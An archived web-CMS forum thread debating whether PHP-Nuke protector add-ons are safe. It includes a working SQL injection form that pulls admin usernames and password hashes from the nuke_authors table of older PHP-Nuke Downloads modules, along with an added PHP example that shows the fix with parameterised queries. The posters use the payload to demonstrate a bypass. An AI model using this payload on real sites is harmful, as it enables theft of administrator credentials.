
Archived ⇒ Can i use Sentinell, Fortress, Protector, Admin Secure ?


Yes you can try.

Is it safe ? NO
Why not? People can bypass the protectors in 5 seconds, and if you want proof, here it is:

<form action="http://YOURSITE.com/html/modules.php?name=Downloads&d_op=viewdownload" method="post">
<textarea name="cid">2 UNION select counter, aid, pwd FROM nuke_authors</textarea>
<input type="submit">
</form>

This is example code and won't work in the latest versions of PHP-Nuke, but older versions are affected. CPG-Nuke is unaffected.

Rectification:
Protector System of Mister does scan POST commands as well, so that's secure

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Fedora 25 / Apache 2.4.27 / MariaDB 10.1.26 / PHP 7.1.10 / Mercurial

Last edited by DJ Maze on Sun Aug 29, 2004 10:47 pm; edited 1 time in total
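
The post's form sends `cid` in the request body, so the fix belongs at the query itself rather than in a request filter. The following is an added PHP example, not code from PHP-Nuke, CPG-Nuke or any protector add-on. The `nuke_downloads` table, the sample rows and the function names are constructed for illustration, and it runs against an in-memory SQLite database through PDO.

```php
<?php
// Added illustration; not code from PHP-Nuke, CPG-Nuke or any protector add-on.
// nuke_authors and its columns come from the post; nuke_downloads and all rows are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE nuke_downloads (cid INTEGER, title TEXT, url TEXT)');
$db->exec('CREATE TABLE nuke_authors (counter INTEGER, aid TEXT, pwd TEXT)');
$db->exec("INSERT INTO nuke_downloads VALUES (2, 'Theme pack', '/files/theme.zip')");
$db->exec("INSERT INTO nuke_authors VALUES (1, 'admin', 'constructed-hash')");

// "Before": the value is pasted into the SQL text, so whatever follows the
// number is parsed as SQL. Arriving by GET or by POST makes no difference here.
function downloads_unsafe(PDO $db, string $cid): array {
    return $db->query("SELECT cid, title, url FROM nuke_downloads WHERE cid = $cid")
              ->fetchAll(PDO::FETCH_NUM);
}

// "After": accept only a plain positive integer, then bind it as a parameter.
function downloads_safe(PDO $db, string $cid): array {
    $id = filter_var($cid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];   // not a category id; nothing reaches the database
    }
    $stmt = $db->prepare('SELECT cid, title, url FROM nuke_downloads WHERE cid = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// A filter that inspects only the query string never sees this value,
// because the form in the post submits cid in the request body.
$posted = '2 UNION select counter, aid, pwd FROM nuke_authors';

foreach (['2', $posted] as $cid) {
    printf("%-55s unsafe rows: %d  safe rows: %d\n",
        var_export($cid, true),
        count(downloads_unsafe($db, $cid)),
        count(downloads_safe($db, $cid)));
}
```

With the hardened function the category id behaves the same whichever request method delivers it, so the site no longer depends on a scanner recognising the string.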


So nothing is secure? Why even make those protection programs then? I was thinking about installing Sentinel because it looks like the best one so far. I'm confused.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/1.3.33/4.4/4.3.11


CPG-Nuke is secure compared to what these programs provide...

AKA Akamu / Read these and your life will be successful | Find a Repair
--
Mods and Professional Support via YIM

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
win32 / Apache 1.3.33 / MySQL 4.1.16/PHP 4.4/CPG-CVS ( browsers: Mozilla 1.7.x / IE6 / Opera 8.0)


Rectification:
Protector System of Mister does scan POST commands as well, so that's secure

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Fedora 25 / Apache 2.4.27 / MariaDB 10.1.26 / PHP 7.1.10 / Mercurial


So nothing is secure? Why even make those protection programs then? I was thinking about installing Sentinel because it looks like the best one so far. I'm confused.


Well, they make these for PHPNuke because, frankly, with PHPNuke any security is better than none at all. I run Protector with CPGNuke but not for security. I run it because it is a convenient way for me to gather data on my problem users and ban them. One shortcoming CPGNuke seems to have is that it lacks a security control interface (like protector's) which allows an admin to see a user's IP and ban them from the site using a simple GUI. Editing .htaccess is too much of a PITA, in my opinion.

Is this security related? For me, no. It has less to do with site security and more to do with my having the ability to easily rid my site of troublemakers. The forum bans are fine but, unfortunately, they do not keep them off of the main site where the shoutblock is located. This has been an issue for me in the past because I host a gaming site which, naturally, means that many of my members are younger and immature. CPG shoutblock bans didn't work in 8.2a. I am not sure if this was corrected in 8.2b, but knowing the CPG Team, I am sure that if it wasn't, it is at least in the works now.

A CPG security module which allows us to keep track of users' IPs, as well as other statistics like operating systems, screen resolutions, countries, etc., would be a VERY welcomed addition to CPG. I realize that the stats mod can do some of this but an all-in-one security module with banning functions (which ban in both the site and forums in one easy stroke) would be more convenient. Would it make CPG more secure? The answer has to be yes. Any time an admin is given increased ability to monitor his server it can only serve to enhance his security and his awareness of what is transpiring on his server. Sure, CPG can handle itself very well but I prefer to have the ability to do my own monitoring as well. (Again, knowing the CPG Team and their commitment to security, I am pretty sure such a module has been considered already or maybe even has been started on).

In the end, a server is only as secure as its admin. Such a tool would greatly enhance the admin's ability to actively monitor his site and would add a less-automated human touch to CPG security. Even in the case of a poor administrator, such a module has no downside. He is no worse off having it and only stands to benefit from it.

In the end, using any module created for PHPNuke with CPGNuke can potentially be a security hazard (yes, even Protector itself). Of the hundreds of hack attempts on my site the only successful one was a hack which hit my only PHPNuke module on the site. Fortunately, CPGNuke protected my other database tables and the damage was laughable. I had the site back up in 15 minutes and was here laughing at the hacker's stupid attempt. That day I removed the offending PHPNuke module and haven't looked back ever since. I recently moved and didn't monitor my site for an entire week. I didn't lose one wink of sleep because I knew the site would still be up and running when I returned. My faith in CPGNuke security was justified...

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢

Last edited by Eccentricity R.I.P. on Wed Sep 15, 2004 11:52 pm; edited 1 time in total


Persistence, you bring up a highly discussed idea. The issue that we face when considering such an enhancement is that logging slows down page generation times. Our standards are to keep page generation times down and keep the hackers away, so this idea will stir up mixed emotions, as far as speed is concerned. We're always looking for new features to add, and we hope that our new version will suit the needs of our users, even though it doesn't include active logging.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux / 1.3.34 / 4.1.18 / 4.4.2 / CVS


Agreed. However, I believe that offering the module as a separate download would solve this issue. I am not suggesting incorporating it into the CMS directly and, hence, forcing it on everyone. I am suggesting offering it as an option to those who care more for security than speed.

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢


such an enhancement is that logging slows down page generation times.


That's the benefit of modularizing it. Those who are willing to sacrifice the speed can, those that don't want it, don't have to.

Personally I think the biggest weakness of phpBB is lack of moderation tools. vB, IPB, SMF all have much more to offer. Has there been any improvement in phpBB 2.x that is worth integrating in?

NEMINI.org, NEMINI.us, NEMINI.info, NYMINI.org

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
1.3.34 (Unix)/4.1.18-standard/4.4.2 /9.1.0.8 CVS


I am moving the site to a Quad 3GHZ Xeon Server in October and I seriously doubt that I will take very much of a performance hit as I will be the only site on the server. For me it is worth the .100 second hit (or less) which I might take. Even if I choose to not use my own server and use my host's 2.8GHZ I doubt that a dedicated server will suffer much. Those on shared plans will, however.

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢


The fact that so many users are using these other systems does highlight a need. I also track users, and if it is included as an option, then let people choose and live with the consequences. After all, they're doing it anyway, with risky non-cpgnuke products.

htaccess is a pain and so is searching website logs.



Exactly. When CPG develops their own module I will dump Protector on its arse. I have absolutely no faith in PHPNuke products. I do not intend offense toward its developers when I say that. Many of those modules aren't written by developers, but by third parties who are not directly involved with PHPNuke development. I only trust CPG-made products. I do not even fully trust my theme (which I ported myself) although I doubt it has any security holes.

I'm formerly known as Persistence and may my soul rest in peace.
Siege-Mods Site Opened: Aug 16th, 2005
The worlds largest Dungeon Siege fan site.
Died: December 2005

Please enter your server specs in your user profile! 😢


To track users I use MS-Analysis. I like how it works but I wish it had the ability to ban IP addresses and/or users. You can exclude IP and/or Users from the stats. I know that speed is an issue but it can run Dynamically or Statically. I am thinking about using Protector for now so that if I need to BAN IPs I can.

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/1.3.33/4.0.22-standard/4.3.10/8.2c


Exactly. When CPG develops their own module I will dump Protector on its arse.


LMAO Mister and I are thinking of creating a protector module especially for CPG-Nuke as an add-on.

He has some ideas and I pointed out to him what is good ;)

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Fedora 25 / Apache 2.4.27 / MariaDB 10.1.26 / PHP 7.1.10 / Mercurial


Great news - even though you have negated the need for the bulk of what protector does, a smaller adaptation will stop people dabbling with all the other crap that is around.



Exactly. When CPG develops their own module I will dump Protector on its arse.


LMAO Mister and I are thinking of creating a protector module especially for CPG-Nuke as an add-on.

He has some ideas and I pointed out to him what is good ;)


That would be cool!

Server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS):
Linux/1.3.33/4.0.22-standard/4.3.10/8.2c
